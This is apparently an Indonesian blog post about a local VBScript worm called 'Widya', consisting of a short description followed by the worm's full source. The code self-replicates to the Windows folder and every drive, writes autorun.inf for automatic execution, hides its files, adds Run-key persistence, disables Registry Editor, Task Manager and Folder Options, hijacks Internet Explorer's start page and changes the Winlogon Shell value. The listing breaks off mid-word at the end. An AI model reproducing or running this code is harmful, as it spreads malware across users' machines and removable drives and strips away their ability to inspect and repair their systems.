virus widya
Ini jenis virus lokal. Source codenya diketahui adanya si pembuat virus dengan membuat file Widia_10205802_32DLL.dll.vbs dan memasukannya ke startup lewat registry. File ini tersembunyi dengan mengubah attributnya membuat file autorun.inf untuk menjalankan secara otomatis di setiap flasdisk juga membuat file Curahaan Hati ku.txt di setiap flashdisk yang kena
file ini muncul jg ketika IE dibuka.. men-disable fungsi regedit, taskmanager dan folder option,dsb,dsb..
Isi pesan yang disampaikan adalah seperti di bawah ini .
on error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe Widia_10205802_32DLL.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\Widia_10205802_32DLL.dll.vbs”)
tf.attributes = 3
set tf=fs.createtextfile(winpath & “\Widia_10205802_32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\Widia_10205802_32DLL.dll.vbs”)
tf.attributes = 3
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\Widia_10205802_32DLL.dll.vbs”)
tf.attributes =3
set tf=fs.createtextfile(flashdrive.path &”\Widia_10205802_32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\Widia_10205802_32DLL.dll.vbs”)
tf.attributes =3
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 3
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=3
tf.colse
set pesan =fs.getfile(flashdrive.path &”\Curahaan Hati ku.txt”)
set pesan=fs.createtextfile(flashdrive.path &”\Curahaan Hati ku.txt”,2,true)
pesan.writeline
pesan.writeline “***************************************************************************************************************************************** ”
pesan.writeline ” Maaf ya coy system terganggu.”
pesan.writeline ” Aku kasih nih Virus untuk mu hehe…”
pesan.writeline ” Tapi kamu gak usah khawatir,gampang tuk dihapus kok.”
pesan.writeline “—————————————————————————————————————————————– ”
pesan.writeline ” Namaku :ILUSI SHELL32″
pesan.writeline ” Panggil aza : Shell32″
pesan.writeline ” Cita2 ku : Terlalu banyak”
pesan.writeline ” Hoby : Bikin Program”
pesan.writeline ” Pekerjaan : Mahasiswa”
pesan.writeline ” Jurusan :Teknik Komputer S1″
pesan.writeline “—————————————————————————————————————————————– ”
pesan.writeline ” HIASAN DILAMAN RINDU KU $$untuk seseorang Anak 2005$$”
pesan.writeline “—————————————————————————————————————————————– ”
pesan.writeline ” Saat indah dalam hidup ku ”
pesan.writeline ” saat ku bertemu dengan mu ”
pesan.writeline ” Kau anugrah yang tercipta begitu nyata”
pesan.writeline ” kau tercantik dalam hati ku”
pesan.writeline ” Walaupun orang tak berkata begitu”
pesan.writeline ” Ku ingin engkau disampingku selamanya”
pesan.writeline ” Bila engkau menerima cinta ku”
pesan.writeline ” Aku akan setia kepada mu ”
pesan.writeline ” Aku akan selalu jujur untuk mu ”
pesan.writeline ” Karena dirimu yang selama ini kucari”
pesan.writeline ” Kata cinta yang ku miliki”
pesan.writeline ” Ingin memberi semuah yang terbaik”
pesan.writeline ” Berharap ku tak berlebih di hati mu”
pesan.writeline ” Karena aku tak sanggup mengungkapkan persaan ku”
pesan.writeline ” Namun aku ini engkau mengerti ”
pesan.writeline ” Apa yang selama ini engkau tidak mengerti”
pesan.writeline “—————————————————————————————————————————————– ”
pesan.writeline
pesan.writeline “***************************************************************************************************************************************** ”
pesan.writeline ” Copyright:ILUSI Shell32 ”
pesan.writeline ” 2007 Reg01″
pesan.Close
end if
next
set rg = createobject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Widia_10205802_32DLL”,winpath&”\Widia_10205802_32DLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Widia2005″
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”,”C:\Curahaan Hati ku.txt”
rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “…….2007…….”
rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “ILUSI PanszoreShell32-01″
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools”, “1″
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr”, “1″
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″
rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell”, “Explorer.exe C:\WINDOWS\exploler.exe”
rg.regwrite “HKCR\vbsfile\DefaultIcon”,”%SystemRoot%\system32\SHELL32.dll,4″
if check <> 1 then
Wscript.sleep 20000
end If
loop while check<>1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullnam
